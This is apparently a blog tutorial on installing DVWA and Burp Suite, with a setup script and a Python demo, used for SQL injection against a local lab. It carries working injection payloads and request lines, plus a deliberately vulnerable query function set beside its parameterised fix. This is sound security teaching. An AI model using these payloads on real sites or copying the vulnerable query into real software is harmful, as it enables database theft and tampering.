Vulnerability Assessment with Burp Suite

Objective: Perform a security assessment of a deliberately vulnerable web application using Burp Suite. We will identify and exploit a SQL Injection flaw, using Burp Suite to intercept and modify the requests.

Introduction

SQL Injection remains one of the most prevalent and dangerous flaws in web applications. By exploiting it, an attacker can gain unauthorized access to the backing database and read, alter, or delete its data. Understanding SQL Injection and testing for it regularly is a basic requirement of web application security. This guide gives a clear, step-by-step walkthrough of SQL Injection testing with Burp Suite, and along the way explains how to recognise the flaw and how to reduce the risk it poses.

Setting Up the Testing Environment

Before diving into SQL Injection testing, it is essential to have the right tools and environment. The process begins by setting up Damn Vulnerable Web Application (DVWA) on an Ubuntu virtual machine. DVWA serves as the target because it is intentionally insecure, which makes it an ideal platform for learning and practice; for the same reason, keep the VM isolated from any network you care about.

Step 1: Update the Linux environment (package index and installed packages).

Step 2: Install Java, which Burp Suite runs on (if not already installed)

Step 3: Install and configure Burp Suite, downloaded from PortSwigger (if not already installed)

Next install Apache, MySQL, and PHP, the components DVWA runs on. Once these are in place, clone DVWA into the web root, create its MySQL database, and edit the DVWA configuration file so that it carries the correct database name and credentials.

Step 4: Install Apache, MySQL, and PHP

Step 5: Clone DVWA from GitHub and place it in /var/www/html/.

Step 6: Set the correct ownership and permissions so the web server can read the files

Step 7: Set up the MySQL database and a database user for DVWA


Step 8: Enter the database name, user and password in DVWA's configuration file

(The configuration file lives in the config folder inside the DVWA folder. Copy config.inc.php.dist to config.inc.php and edit the copy.)

With the setup complete, access DVWA in a web browser at http://localhost/DVWA/. Logging in with the default credentials (admin / password) gives access to the vulnerable modules, including the one dedicated to SQL Injection.

Step 9: Access DVWA (localhost) via a web browser
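Steps 1, 2 and 4 to 8 collected into one script. This is an added example written for this guide, not a script from the DVWA project or from PortSwigger; Step 3 (downloading and installing Burp Suite) is done by hand and is not covered. It assumes an Ubuntu VM with sudo, that the MySQL root account is reachable with `sudo mysql` (Ubuntu's default auth_socket setup), and that DVWA's config.inc.php.dist uses the `$_DVWA[ 'db_user' ] = '...';` line layout. The database name, user and password are lab values chosen here.

```shell
#!/usr/bin/env bash
# Added example for this guide: DVWA lab setup on Ubuntu. Not DVWA's own script.
set -eu

DVWA_DIR=/var/www/html/DVWA
DB_NAME=dvwa
DB_USER=dvwa
DB_PASS='p@ssw0rd'   # lab-only value; it must not contain ' | or & (see set_dvwa_option)

# Steps 1, 2 and 4: refresh the system, install Java for Burp Suite, then the LAMP stack.
install_stack() {
    sudo apt update && sudo apt -y upgrade
    sudo apt -y install default-jre apache2 mysql-server php php-mysqli php-gd git
}

# Steps 5 and 6: clone DVWA into the web root and hand it to the Apache user.
clone_dvwa() {
    sudo git clone https://github.com/digininja/DVWA.git "$DVWA_DIR"
    sudo chown -R www-data:www-data "$DVWA_DIR"
    sudo chmod -R 755 "$DVWA_DIR"
}

# Step 7: create the database and a dedicated user that can touch only that database.
create_db() {
    sudo mysql <<SQL
CREATE DATABASE IF NOT EXISTS \`$DB_NAME\`;
CREATE USER IF NOT EXISTS '$DB_USER'@'localhost' IDENTIFIED BY '$DB_PASS';
GRANT ALL PRIVILEGES ON \`$DB_NAME\`.* TO '$DB_USER'@'localhost';
FLUSH PRIVILEGES;
SQL
}

# Step 8 helper: rewrite one  $_DVWA[ 'key' ] = '...';  line in a config file.
# Assumes DVWA's config.inc.php layout; the value is spliced into a sed expression,
# so it must not contain the delimiter '|', '&' or a single quote.
set_dvwa_option() {
    local file=$1 key=$2 value=$3
    sed -i "s|^\(\$_DVWA\[ '$key' \][[:space:]]*=[[:space:]]*\)'[^']*'|\1'$value'|" "$file"
}

# Step 8: copy the template, fill in the database settings, install it readable by Apache only.
configure_dvwa() {
    local cfg="$DVWA_DIR/config/config.inc.php" tmp
    tmp=$(mktemp)
    cp "$DVWA_DIR/config/config.inc.php.dist" "$tmp"
    set_dvwa_option "$tmp" db_database "$DB_NAME"
    set_dvwa_option "$tmp" db_user "$DB_USER"
    set_dvwa_option "$tmp" db_password "$DB_PASS"
    sudo install -o www-data -g www-data -m 640 "$tmp" "$cfg"
    rm -f "$tmp"
}

# The full setup runs only as "./setup-dvwa.sh install", so the functions can also
# be sourced and exercised one at a time.
if [ "${1:-}" = "install" ]; then
    install_stack
    clone_dvwa
    create_db
    configure_dvwa
    echo "DVWA is ready at http://localhost/DVWA/ (default login admin / password)."
fi
```

After the script finishes, open http://localhost/DVWA/setup.php and click "Create / Reset Database" so DVWA populates its tables; the config.inc.php written here is what that page reads.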



Configuring Burp Suite

Burp Suite sits between the web browser and the web application as an intercepting proxy, which is what makes it an effective tool for web application security testing. It has to be configured correctly before it can record and let you examine and edit the HTTP requests and responses passing through it.

Begin by launching Burp Suite and confirming that the proxy listener is running on 127.0.0.1:8080. Burp captures every request the browser sends to that port. Next, configure the browser to use this proxy so that all interactions with DVWA are routed through Burp Suite; until the browser is pointed at the proxy, nothing will appear in Burp's Proxy history.

Step 10: Set up the proxy listener in Burp Suite on 127.0.0.1:8080


Step 11: Configure the browser to use the proxy above

Installing Burp Suite's CA certificate in the browser is needed for HTTPS traffic: it avoids TLS certificate warnings and allows Burp Suite to decrypt and inspect the secured requests and responses. The local DVWA instance is served over plain HTTP, so this step is not strictly required for this lab, but it is part of any normal Burp setup.

Step 12: Install Burp Suite's CA certificate into the browser's trusted certificate authorities


Exploiting SQL Injection

Once a potential SQL Injection point is identified, it is time to attempt exploitation. The goal is to change the logic of the SQL query by injecting SQL syntax through the user input. A common payload is ' OR 1=1-- (note the trailing space after -- ; MySQL only treats -- as a comment when whitespace follows it, and # works as well), which closes the string the input sits in and adds a condition that is always true.

To do this, capture the HTTP request that carries the user input with Burp Suite. In the intercepted request, replace the value of the input parameter with the SQL payload, forward the modified request to the server, and compare the response with the one for a normal value.

Step 13: In Burp Suite, go to Proxy > Intercept and make sure "Intercept is on."


Step 14: Submit a value in the User ID field of the SQL Injection page so that Burp captures the request

Step 15: In the captured request, replace the id parameter's value with the SQL payload and forward it

A successful SQL Injection shows up as behaviour the application never intended, such as every record being returned or an authentication check being skipped. Here the modified request is "id=1 or 1=1;#&Submit=Submit". The injected condition 1=1 is always true, so the WHERE clause no longer limits the result to one User ID, and "#" comments out whatever the original query had after the injection point so it cannot cause a syntax error. Two details matter when reproducing this. First, DVWA's low-security module embeds the id inside single quotes (WHERE user_id = '$id'), so the reliable form closes that quote first, for example 1' OR 1=1#; a payload that stays inside the quotes is compared as a string, and MySQL converts it to a number from its leading digits, so only user 1 comes back. Second, when editing the raw request line in Burp, percent-encode the space and the hash (%20 and %23): a browser treats "#" as the start of a URL fragment and never sends it, and an unencoded space breaks the request line. Getting more rows back than the one requested confirms that the input reaches the SQL parser, which is to say the application is vulnerable.
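The query behind the result above, rebuilt so the payloads can be checked offline. This is an added example, not DVWA's PHP or the author's code. It uses an in-memory SQLite table constructed here in place of DVWA's MySQL users table (the five rows are made up), so the comment sequence is "-- " with a trailing space, which both MySQL and SQLite accept, rather than the MySQL-only "#". vulnerable_lookup mirrors the low-security module, where the id is pasted between single quotes; safe_lookup is the parameterised fix; boolean_probe is the true/false check a tester uses to confirm an injection before dumping rows; and dvwa_request_line shows the percent-encoded request line to paste into Burp. The function and table names are this example's own.

```python
import sqlite3
from urllib.parse import quote

# Constructed stand-in for DVWA's users table (SQLite in memory, not MySQL).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
    (4, "Pablo", "Picasso"),
    (5, "Bob", "Smith"),
]


def make_db() -> sqlite3.Connection:
    """Create the in-memory table and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    """Same shape as DVWA's low-security query: the id is pasted between single
    quotes, so a quote in the input ends the string and the rest is parsed as SQL."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}';"
    return conn.execute(query).fetchall()


def safe_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    """Parameterised form: the driver binds user_id as a value, never as SQL text."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?;", (user_id,)
    ).fetchall()


def boolean_probe(conn: sqlite3.Connection, lookup) -> bool:
    """Boolean-based confirmation: send the same id with an always-true and an
    always-false suffix. Different answers mean the suffix reached the SQL parser."""
    true_rows = lookup(conn, "1' AND 1=1-- ")
    false_rows = lookup(conn, "1' AND 1=2-- ")
    return true_rows != false_rows


def dvwa_request_line(payload: str) -> str:
    """Request line to paste into Burp's Intercept or Repeater. Spaces, quotes and
    '#' are percent-encoded so the request line stays valid and '#' is not taken
    for a URL fragment (a browser would drop it before sending)."""
    return (
        f"GET /DVWA/vulnerabilities/sqli/?id={quote(payload, safe='')}"
        "&Submit=Submit HTTP/1.1"
    )


if __name__ == "__main__":
    db = make_db()
    print("normal id 1     :", vulnerable_lookup(db, "1"))
    print("' OR 1=1--      :", vulnerable_lookup(db, "' OR 1=1-- "))
    print("parameterised   :", safe_lookup(db, "' OR 1=1-- "))
    print("vulnerable probe:", boolean_probe(db, vulnerable_lookup))
    print("safe probe      :", boolean_probe(db, safe_lookup))
    print(dvwa_request_line("1' OR 1=1#"))
```

The probe is the step worth keeping: a single OR 1=1 that returns every row is convincing, but on a page that does not display rows, the pair of always-true and always-false conditions giving different responses is the evidence that survives, and it is the same comparison Burp's Repeater makes easy by sending the two requests side by side.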

Conclusion

The importance of web application security in today's environment is hard to overstate. SQL Injection is a common yet potent attack that can do significant damage if left unchecked. This project walks through the practical steps of locating and exploiting a SQL Injection flaw, experience that matters for anyone serious about web security. Knowing how these attacks operate, and applying the matching defences such as parameterised queries and least-privilege database accounts, is what keeps data safe and web applications protected. Proficiency in SQL Injection testing is therefore a core skill for improving the overall security of web applications.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


Project by: Chandu Dissanayake

Article by: Chandu Dissanayake

Comments

  1. Wow bro.
    Thanks a lot.
    Great article

  2. This is an amazing and very informative article!🛡️ A must-read for anyone learning about cybersecurity. Great job! 💖

